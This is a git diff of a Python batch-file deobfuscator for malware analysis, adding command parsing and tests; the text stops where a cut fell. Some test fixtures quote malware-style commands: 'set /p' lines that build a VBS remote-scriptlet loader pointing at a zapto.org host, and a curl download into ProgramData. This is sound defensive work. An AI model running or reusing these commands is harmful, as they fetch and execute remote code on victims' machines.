diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index e15275c..89a4df8 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -7,6 +7,7 @@ import shlex import shutil import string +import sys import tempfile from collections import defaultdict from urllib.parse import urlparse @@ -17,6 +18,7 @@ ENC_RE = rb"(?i)(?:-|/)e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?)?)?)?)?)?)?)?$" PWR_CMD_RE = rb"(?i)(?:-|/)c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?$" PWR_FILE_RE = rb"(?i)(?:-|/)f(?:i(?:l(?:e?)?)?)?$" +REDIRECTORS_RE = r"\s*(<|\d?>>?)\s*(\"(?:[^\"]|\"\"|\^\")+\"|[^\s><]+)" # Gathered from https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2 RARE_LOLBAS = [ @@ -52,6 +54,57 @@ def line_is_comment(line: str) -> bool: return False +# Taken from https://stackoverflow.com/questions/33560364/python-windows-parsing-command-lines-with-shlex +# An alternative would be https://github.com/smoofra/mslex or https://github.com/petamas/oslex (which use mslex) +def cmdline_split(s, platform="this"): + """Multi-platform variant of shlex.split() for command-line splitting. + For use with subprocess, for argv injection etc. Using fast REGEX. + + platform: 'this' = auto from current platform; + 1 = POSIX; + 0 = Windows/CMD + (other values reserved) + """ + if platform == "this": + platform = sys.platform != "win32" + if platform == 1: + RE_CMD_LEX = r""""((?:\\["\\]|[^"])*)"|'([^']*)'|(\\.)|(&&?|\|\|?|\d?\>|[<])|([^\s'"\\&|<>]+)|(\s+)|(.)""" + elif platform == 0: + RE_CMD_LEX = r""""((?:""|\\["\\]|[^"])*)"?()|(\\\\(?=\\*")|\\")|(&&?|\|\|?|\d?>|[<])|([^\s"&|<>]+)|(\s+)|(.)""" + else: + raise AssertionError("unkown platform %r" % platform) + + args = [] + accu = None # collects pieces of one arg + for qs, qss, esc, pipe, word, white, fail in re.findall(RE_CMD_LEX, s): + if word: + pass # most frequent + elif esc: + word = esc[1] + elif white or pipe: + if accu is not None: + args.append(accu) + if pipe: + args.append(pipe) + accu = None + continue + elif fail: + raise ValueError("invalid or incomplete shell string") + elif qs: + word = qs.replace('\\"', '"').replace("\\\\", "\\") + if platform == 0: + word = word.replace('""', '"') + else: + word = qss # may be even empty; must be last + + accu = (accu or "") + word + + if accu is not None: + args.append(accu) + + return args + + class BatchDeobfuscator: def __init__(self, complex_one_liner_threshold=4): self.file_path = None @@ -118,10 +171,19 @@ def __init__(self, complex_one_liner_threshold=4): "__compat_layer": "DetectorsMessageBoxErrors", } - # There are 211 lines coming out of curl --help, so I won't be parsing all the options + # There are 211 lines coming out of curl --help, so we won't parse all the options self.curl_parser = argparse.ArgumentParser() # Data could be had multiple time, but since we don't use it, we can ignore it - self.curl_parser.add_argument("-d", "--data", dest="data", help="Data to send") + self.curl_parser.add_argument( + "-d", + "--data", + "--data-ascii", + "--data-binary", + "--data-raw", + "--data-urlencode", + dest="data", + help="Data to send", + ) self.curl_parser.add_argument("-o", "--output", dest="output", help="Write to file instead of stdout") self.curl_parser.add_argument("-H", "--header", dest="header", help="Extra header to include") self.curl_parser.add_argument( @@ -151,12 +213,12 @@ def read_logical_line(self, path): with open(path, "r", encoding="utf-8", errors="ignore") as input_file: logical_line = "" for line in input_file: - if not line.endswith("^"): + if not line.rstrip("\r\n").endswith("^"): logical_line += line yield logical_line logical_line = "" else: - logical_line += line + "\n" + logical_line += line.rstrip("\r\n")[:-1] def find_closing_paren(self, statement): state = "init" @@ -164,7 +226,7 @@ def find_closing_paren(self, statement): start_command = 0 for char in statement: # print(f"C:{char}, S:{state}") - if state == "init": # init state + if state == "init": if char == '"': # quote is on state = "str_s" elif char == "^": @@ -279,7 +341,7 @@ def get_commands(self, logical_line): start_command = 0 for char in logical_line: # print(f"C:{char}, S:{state}") - if state == "init": # init state + if state == "init": if char == '"': # quote is on state = "str_s" elif char == "^": @@ -301,13 +363,13 @@ def get_commands(self, logical_line): counter += 1 - last_com = logical_line[start_command:].strip() + # Remove leading spaces/tabs and trailing newlines + last_com = logical_line[start_command:].lstrip().rstrip("\r\n") if last_com != "": for part in self.get_commands_special_statement(last_com): yield part def get_value(self, variable): - str_substitution = ( r"([%!])(?P[\"^|!\w#$'()*+,-.?@\[\]`{}~\s+]+)" r"(" @@ -319,8 +381,7 @@ def get_value(self, variable): matches = re.finditer(str_substitution, variable, re.MULTILINE) value = "" - - for matchNum, match in enumerate(matches): + for match in matches: var_name = match.group("variable").lower() if var_name in self.variables: value = self.variables[var_name] @@ -381,6 +442,8 @@ def interpret_set(self, cmd): elif char == "^": old_state = state state = "escape" + elif char == "=": + state = "value" else: state = "var" var_name += char @@ -437,31 +500,37 @@ def interpret_set(self, cmd): var_value = f"({var_value.strip(' ')})" elif option == "p": last_quote_index = max(var_value.rfind("'"), var_value.rfind('"')) - set_in = var_value.rfind("<") - set_out = var_value.rfind(">") - - if set_out != -1 and set_out > last_quote_index: - file_redirect = var_value[set_out:].lstrip(">").strip() - content = var_value[:set_out].strip() - if set_in != -1 and set_in < set_out: - content = var_value[:set_in].strip() - elif set_in > set_out: - file_redirect = file_redirect[: set_in - set_out - 1] - if content[0] == content[-1] in ["'", '"']: - content = content[1:-1].strip() - file_redirect = file_redirect.strip() - self.modified_filesystem[file_redirect.lower()] = {"type": "content", "content": content} - self.traits["setp-file-redirection"].append((cmd, file_redirect)) - - if set_in == -1 or set_in < last_quote_index: + file_redirect = None + file_input = None + redirectors_string = var_value[last_quote_index + 1 :].strip() + if redirectors_string: + while redirector := re.match(REDIRECTORS_RE, redirectors_string): + if redirector.group(1) in ["1>", ">"]: + file_redirect = redirector.group(2).strip() + file_redirect_append = False + elif redirector.group(1) in ["1>>", ">>"]: + file_redirect = redirector.group(2).strip() + file_redirect_append = True + elif redirector.group(1) == "<": + file_input = redirector.group(2).strip() + redirectors_string = redirectors_string[redirector.end() :] + + if file_redirect: + content = var_value[: last_quote_index + 1].strip() + if content and file_redirect != "nul": + if content[0] == content[-1] in ["'", '"']: + content = content[1:-1] + if file_redirect_append: + if file_redirect.lower() in self.modified_filesystem: + content = f"{self.modified_filesystem[file_redirect.lower()]['content']}{content}" + self.modified_filesystem[file_redirect.lower()] = {"type": "content", "content": content} + self.traits["setp-file-redirection"].append((f"set{cmd}", file_redirect)) + + if file_input is None: var_value = "__input__" else: # We can recover the value right away - actual_value = var_value[set_in:].lstrip("<") - if set_out > set_in: - actual_value = actual_value[: set_out - set_in - 1] - actual_value = actual_value.strip() - if actual_value == "nul": + if file_input.strip() == "nul": var_value = "" else: # We could get a value from the redirection, but for the moment we'll leave it generic @@ -477,7 +546,7 @@ def interpret_curl(self, cmd): # Batch specific obfuscation that is not handled before for echo/variable purposes, can be stripped here cmd = cmd.replace('""', "") try: - split_cmd = shlex.split(cmd, posix=False) + split_cmd = cmdline_split(cmd, platform=0) except ValueError: # Probably a "No closing quotation" # Usually generated from corrupted or non-batch files @@ -501,6 +570,9 @@ def interpret_powershell(self, normalized_comm): # Assume the first element is the call to powershell cmd = normalized_comm.split()[1:] + if len(cmd) == 0: + return + if cmd[0].lower() in ["invoke-webrequest", "iwr"]: # Parse this more similarly to curl than proper powershell args, unknown = self.powershell_invoke_webrequest_parser.parse_known_args(cmd[1:]) @@ -511,6 +583,12 @@ def interpret_powershell(self, normalized_comm): for idx, part in enumerate(cmd): if re.match(ENC_RE, part.encode()): + if len(cmd) == idx + 1: + # We do not have more arguments + # This my be caused by a script that does + # echo cHdk | powershell -Encoded + break + if cmd[idx + 1][0] in ["'", '"']: last_part = idx + 1 for i in range(last_part, len(cmd)): @@ -577,8 +655,13 @@ def interpret_mshta(self, cmd): def interpret_rundll32(self, cmd): # The command is supposed to be split on "," but we're getting rid of them earlier. - # If we every fix the loss of commas, we need to fix this split. + # If we ever fix the loss of commas, we need to fix this split. split_cmd = cmd.split(" ") + + if len(split_cmd) == 1: + # Rundll call without a dll, probably from a corrupted file + return + if split_cmd[1].lower() in self.modified_filesystem: rundll_struct = {} if self.modified_filesystem[split_cmd[1].lower()]["type"] == "download": @@ -623,14 +706,103 @@ def interpret_copy(self, cmd): self.traits["windows-util-manipulation"].append((cmd, {"src": src, "dst": dst})) self.modified_filesystem[dst.lower()] = {"type": "file", "src": src} + def interpret_net(self, cmd): + if cmd[:7].lower() != "net use" or cmd[:8].lower() == "net user": + # Started with "net" but not "net use", not what we're interested into + return + r""" + net use + [{ | *}] + [\\\[\]] + [{ | *}]] + [/user:[\] + [/user:[\]] + [/user: [] + [/savecred] + [/smartcard] + [{/delete | /persistent:{yes | no}}] + net use [ [/home[{ | *}] [/delete:{yes | no}]] + net use [/persistent:{yes | no}] + """ + split_cmd = cmd.split() + if len(split_cmd) <= 2 or split_cmd[2] == "*" or split_cmd[2][:2].lower() == "/p": + # Maybe a "net use * /d /y" or a "net use /persistent:yes" + return + + info = {"options": []} + extra_params = [] + for param in shlex.split(cmd, posix=False)[2:]: + if any(param.startswith(x) for x in [">", ">>", "1>", "1>>", "2>", "2>>"]): + # We reached the redirection part of the command + break + + if param[0] == param[-1] and param[0] in ["'", '"']: + param = param[1:-1] + + param_lowercase = param.lower() + if param_lowercase.startswith("/sa"): + info["options"].append("savecred") + continue + elif param_lowercase.startswith("/sm"): + info["options"].append("smartcard") + continue + elif param_lowercase.startswith("/d"): + if ":" in param_lowercase and param_lowercase.split(":", 1)[1].startswith("n"): + info["options"].append("not-delete") + else: + info["options"].append("delete") + continue + elif param_lowercase.startswith("/p"): + if ":" in param_lowercase and param_lowercase.split(":", 1)[1].startswith("n"): + info["options"].append("not-persistent") + else: + info["options"].append("persistent") + continue + elif param_lowercase.startswith("/u"): + info["user"] = param.split(":", 1)[1] + continue + # /y and /n looks to be undocumented confirmation silent responses + elif param_lowercase.startswith("/y"): + info["options"].append("auto-accept") + continue + elif param_lowercase.startswith("/n"): + info["options"].append("auto-decline") + continue + + extra_params.append(param) + + if not extra_params: + # Probably something like + # net use %UNKNOWN_VAR% /delete + # Which gets resolved to + # net use /delete + return + + if extra_params[0] == "*" or re.match(r"\w:$", extra_params[0]): + info["devicename"] = extra_params.pop(0) + if extra_params: + info["server"] = extra_params.pop(0) + if extra_params: + info["password"] = extra_params.pop(0) + + if extra_params: + # Either we're handling a corrupted script, or the path contains spaces without being rightly quoted + # In that case, we'll assume no password were provided and will use all extra params as the server + info["server"] = " ".join([info["server"], info.pop("password")] + extra_params) + + if not info["options"]: + info.pop("options") + + self.traits["net-use"].append((cmd, info)) + def interpret_command(self, normalized_comm): if line_is_comment(normalized_comm): return - # We need to keep the last space in case the command is "set EXP=43 " so that the value will be "43 " + # We need to keep trailing spaces in case the command is "set EXP=43 ", so that the value will be "43 " # normalized_comm = normalized_comm.strip() - # remove paranthesis + # Remove parenthesis index = 0 last = len(normalized_comm) - 1 while index < last and (normalized_comm[index] == " " or normalized_comm[index] == "("): @@ -649,12 +821,17 @@ def interpret_command(self, normalized_comm): if normalized_comm[0] == "@": normalized_comm = normalized_comm[1:] + # Verify that the command isn't '@ ' + if not normalized_comm.strip(): + return + normalized_comm_lower = normalized_comm.lower() command = normalized_comm_lower.split()[0] + # In case the command is `set/p`, we want only `set` if len(normalized_comm_lower.split("/")[0]) < len(command): command = normalized_comm_lower.split("/")[0] - # Some commands like set cannot be split by double-quotes, but cmd and powershell can. + # Some commands like `set` cannot be split by double quotes, but `cmd` and `powershell` can. if '""' in command: ori_cmd_len = len(command) command = command.replace('""', "") @@ -669,7 +846,7 @@ def interpret_command(self, normalized_comm): command = self.modified_filesystem[command]["src"] if command == "call": - # TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be remove + # TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be removed. # This shouldn't work: # call @set EXP=43 # But this should: @@ -698,7 +875,7 @@ def interpret_command(self, normalized_comm): return if command == "set": - # interpreting set command + # Interpreting `set` command var_name, var_value = self.interpret_set(normalized_comm[3:]) if var_value == "": if var_name.lower() in self.variables: @@ -724,6 +901,9 @@ def interpret_command(self, normalized_comm): if command == "copy": self.interpret_copy(normalized_comm) + if command == "net": + self.interpret_net(normalized_comm) + def valid_percent_tilde(self, argument): return argument == "%" or (argument.startswith("%~") and all(x in "fdpnxsatz" for x in argument[2:])) @@ -923,7 +1103,12 @@ def normalize_command(self, command): def analyze_logical_line(self, logical_line, working_directory, f, extracted_files): commands = self.get_commands(logical_line) for command in commands: - normalized_comm = self.normalize_command(command) + try: + normalized_comm = self.normalize_command(command) + except RecursionError: + # If a variable contains itself, we will recurse infinitly to expand it + normalized_comm = command + if len(list(self.get_commands(normalized_comm))) > 1: self.traits["command-grouping"].append({"Command": command, "Normalized": normalized_comm}) self.analyze_logical_line(normalized_comm, working_directory, f, extracted_files) @@ -1063,7 +1248,6 @@ def handle_bat_file(deobfuscator, fpath): deobfuscator = BatchDeobfuscator() if args[0].file is not None: - file_path = args[0].file for logical_line in deobfuscator.read_logical_line(args[0].file): diff --git a/tests/test_curl.py b/tests/test_curl.py index a411b90..603197a 100644 --- a/tests/test_curl.py +++ b/tests/test_curl.py @@ -51,6 +51,40 @@ {"src": "http://localhost:5572/rc/noop?rutabaga=3&potato=4", "dst": None}, ), ), + ( + "curl.exe -o C:\\ProgramData\\Pterds\\HErtop.pos 1.1.1.1/4.dat", + ( + "curl.exe -o C:\\ProgramData\\Pterds\\HErtop.pos 1.1.1.1/4.dat", + {"src": "1.1.1.1/4.dat", "dst": "C:\\ProgramData\\Pterds\\HErtop.pos"}, + ), + ), + ( + r'curl -X POST --fail -H "Content-type: application/x-www-form-urlencoded" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" http://server.com/data?style=table', + ( + r'curl -X POST --fail -H "Content-type: application/x-www-form-urlencoded" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" http://server.com/data?style=table', + { + "src": "http://server.com/data?style=table", + "dst": None, + }, + ), + ), + ( + r'curl -X POST --fail -H "Content-type: application/octet-stream" -H "Accept: application/json" -H "Content-Disposition: attachment; filename=myupload.file" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" --data-binary "@some\path\with\my\file.data" http://server.com/upload?overwrite=true', + ( + r'curl -X POST --fail -H "Content-type: application/octet-stream" -H "Accept: application/json" -H "Content-Disposition: attachment; filename=myupload.file" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" --data-binary "@some\path\with\my\file.data" http://server.com/upload?overwrite=true', + { + "src": "http://server.com/upload?overwrite=true", + "dst": None, + }, + ), + ), + ( + r'curl -X POST -H "Content-type: application/json" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" -d "{\"someParameters\": [{\"name\":\"FILE_NAME\" \"value\": \"filename.file\"} {\"name\":\"OTHER_PARAM\" \"value\": \"TRUE\"} {\"name\":\"COMPLEX_PARAM\" \"value\": [\"some\" \"other\" \"value\"]} ]}" http://server.com/data.page >>some\file\output.json', + ( + r'curl -X POST -H "Content-type: application/json" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" -d "{\"someParameters\": [{\"name\":\"FILE_NAME\" \"value\": \"filename.file\"} {\"name\":\"OTHER_PARAM\" \"value\": \"TRUE\"} {\"name\":\"COMPLEX_PARAM\" \"value\": [\"some\" \"other\" \"value\"]} ]}" http://server.com/data.page >>some\file\output.json', + {"src": "http://server.com/data.page", "dst": None}, + ), + ), ], ) def test_curl_extraction(statement, download_trait): diff --git a/tests/test_full_script.py b/tests/test_full_script.py new file mode 100644 index 0000000..d3a935a --- /dev/null +++ b/tests/test_full_script.py @@ -0,0 +1,46 @@ +import os +import tempfile + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +# Taken from 675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 +# A Grub file that contains a batch script +# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it +def test_in_check_infinite_recursion(): + deobfuscator = BatchDeobfuscator() + script = rb""" +if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit +call Fn.11 "%in_check%" "1" && exit 1 +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + # No assert, just making sure it does not error out. + + +def test_concat_logical_lines(): + deobfuscator = BatchDeobfuscator() + script = rb"""REM download log file +curl -X GET --fail ^ +-H "Accept: application/octet-stream" ^ +http://server.org/data?accept=data >>met\resultat\output.log""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + bat_filename, _ = deobfuscator.analyze(tf.name, temp_dir) + + with open(os.path.join(temp_dir, bat_filename), "rb") as f: + result = f.read() + lines = result.split(b"\r\n") + + assert len(lines) >= 2 + assert lines[0] == b"REM download log file" + assert lines[1] == ( + rb'curl -X GET --fail -H "Accept: application/octet-stream" ' + rb"http://server.org/data?accept=data >>met\resultat\output.log" + ) diff --git a/tests/test_net.py b/tests/test_net.py new file mode 100644 index 0000000..594b3d4 --- /dev/null +++ b/tests/test_net.py @@ -0,0 +1,210 @@ +import tempfile + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +def test_net_user(): + deobfuscator = BatchDeobfuscator() + deobfuscator.interpret_command("net user") + assert len(deobfuscator.traits) == 0 + deobfuscator.interpret_command("net user guest") + assert len(deobfuscator.traits) == 0 + deobfuscator.interpret_command("net user administrator") + assert len(deobfuscator.traits) == 0 + + +def test_net_use_user_password(): + deobfuscator = BatchDeobfuscator() + cmd = "net use Q: https://webdav.site.com passw'd /user:username@site.com" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "Q:", + "server": "https://webdav.site.com", + "password": "passw'd", + "user": "username@site.com", + }, + ) + + +def test_net_use_user(): + deobfuscator = BatchDeobfuscator() + cmd = r"net use d: \\server\share /user:Accounts\User1" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "d:", + "server": r"\\server\share", + "user": r"Accounts\User1", + }, + ) + + +def test_net_use_no_devicename(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE C:\TEMP\STUFF" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + print(deobfuscator.traits) + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "server": r"C:\TEMP\STUFF", + }, + ) + + +def test_net_use_delete(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE X: /DELETE" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "X:", + "options": ["delete"], + }, + ) + + cmd = r"NET USE U: /DELETE /y" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 2 + assert deobfuscator.traits["net-use"][1] == ( + cmd, + { + "devicename": "U:", + "options": ["delete", "auto-accept"], + }, + ) + + +def test_net_use_delete_with_server(): + deobfuscator = BatchDeobfuscator() + cmd = r"net use f: \\financial\public /delete" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "f:", + "server": r"\\financial\public", + "options": ["delete"], + }, + ) + + +def test_net_use_missing_var(): + # Probably something like + # net use %UNKNOWN_VAR% /delete + # Which gets resolved to + # net use /delete + deobfuscator = BatchDeobfuscator() + cmd = r"net use /delete" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 0 + + +def test_net_use_redirect(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE U: \\server\files >> output.log" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "U:", + "server": r"\\server\files", + }, + ) + + +def test_net_use_space(): + deobfuscator = BatchDeobfuscator() + cmd = r'net use g: "\\server.local\some\path\to\a nice folder" /user:domain\username' + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "g:", + "server": r"\\server.local\some\path\to\a nice folder", + "user": r"domain\username", + }, + ) + + +def test_net_use_space_no_quotes(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE Z: \\server\folder\No Quotes For Some Reason" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "Z:", + "server": r"\\server\folder\No Quotes For Some Reason", + }, + ) + + +def test_net_use_from_text_blob(): + deobfuscator = BatchDeobfuscator() + # Found in 8d06dd9b902bd1d3fcf55ced6ceb2488903c337dde28e7ad1a9c94e9dc5cfd38 + cmd = r"net use x: \\\C$)." + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "x:", + "server": r"\\\C$).", + }, + ) + + +def test_net_use_script(): + deobfuscator = BatchDeobfuscator() + script = rb""" +net use w: /delete >nul 2>nul +if not exist w: ( + net use w: \\server\files /Persistent:NO >nul 2>nul + ) +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + assert "net-use" in deobfuscator.traits + assert len(deobfuscator.traits["net-use"]) == 2 + assert deobfuscator.traits["net-use"][0] == ( + r"net use w: /delete >nul 2>nul", + { + "devicename": "w:", + "options": ["delete"], + }, + ) + assert deobfuscator.traits["net-use"][1] == ( + r"net use w: \\server\files /Persistent:NO >nul 2>nul", + { + "devicename": "w:", + "server": r"\\server\files", + "options": ["not-persistent"], + }, + ) diff --git a/tests/test_powershell.py b/tests/test_powershell.py index be84221..a1947be 100644 --- a/tests/test_powershell.py +++ b/tests/test_powershell.py @@ -1,3 +1,5 @@ +import tempfile + import pytest from batch_deobfuscator.batch_interpreter import BatchDeobfuscator @@ -36,6 +38,9 @@ "powershell -Command \"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}\" > \"%WORKINGDIRONEDRIVE%\\OneDriveElevated.txt\"", b"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}", ), + ("powershell", None), + # echo cHdk | powershell -Encoded + ("powershell -Encoded", None), ], ) def test_extract_powershell(statement, extracted_ps1): diff --git a/tests/test_rundll.py b/tests/test_rundll.py new file mode 100644 index 0000000..f805bd0 --- /dev/null +++ b/tests/test_rundll.py @@ -0,0 +1,8 @@ +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +def test_dry_rundll32(): + deobfuscator = BatchDeobfuscator() + cmd = r"$WINSYSDIR$\RunDLL32.exe" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 0 diff --git a/tests/test_setp.py b/tests/test_setp.py new file mode 100644 index 0000000..9226952 --- /dev/null +++ b/tests/test_setp.py @@ -0,0 +1,85 @@ +import pytest + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +@pytest.mark.parametrize( + "cmd, fs", + [ + ('set/p str="a"a" "out.txt', ["out.txt"]), + ('set/p str="a"a" "OUt.tXt', ["out.txt"]), + ('set/p str="a"a" ">out.txtout.txt', ["out.txt"]), + ('set/p str="a"a" " out.txt', ["out.txt"]), + ], +) +def test_set_redirection(cmd, fs): + deobfuscator = BatchDeobfuscator() + deobfuscator.interpret_command(cmd) + assert list(deobfuscator.modified_filesystem.keys()) == fs + if fs: + assert deobfuscator.modified_filesystem["out.txt"]["content"] == 'a"a" ' + + +def test_create_append_file(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p="OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb" 1>C:\Users\Public\\Xdg72.vbs' + cmd2 = r'set /p="ject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")^">>C:\Users\Public\\Xdg72.vbs' + deobfuscator.interpret_command(cmd1) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 1 + assert deobfuscator.traits["setp-file-redirection"][0] == ( + cmd1, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb', + } + deobfuscator.interpret_command(cmd2) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 2 + assert deobfuscator.traits["setp-file-redirection"][1] == ( + cmd2, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetObject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")', + } + + +def test_create_append_file_with_stderr(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p="OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb" 1>C:\Users\Public\\Xdg72.vbs 2>nul' + cmd2 = r'set /p="ject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")^">>C:\Users\Public\\Xdg72.vbs 2>nul' + deobfuscator.interpret_command(cmd1) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 1 + assert deobfuscator.traits["setp-file-redirection"][0] == ( + cmd1, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb', + } + deobfuscator.interpret_command(cmd2) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 2 + assert deobfuscator.traits["setp-file-redirection"][1] == ( + cmd2, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetObject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")', + } + + +def test_empty_content(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p pidvalue=<"C:\TEMP\~pid.txt" >nul 2>nul' + deobfuscator.interpret_command(cmd1) + assert deobfuscator.variables["pidvalue"] == "__input__" diff --git a/tests/test_unittests.py b/tests/test_unittests.py index ac2c4fb..07cfdfc 100644 --- a/tests/test_unittests.py +++ b/tests/test_unittests.py @@ -720,22 +720,6 @@ def test_anti_recursivity_with_quotes(): assert cmd2 == 'echo a\\"a' - @staticmethod - @pytest.mark.parametrize( - "cmd, fs", - [ - ('set/p str="a"a" "out.txt', ["out.txt"]), - ('set/p str="a"a" "OUt.tXt', ["out.txt"]), - ('set/p str="a"a" ">out.txtout.txt', ["out.txt"]), - ('set/p str="a"a" "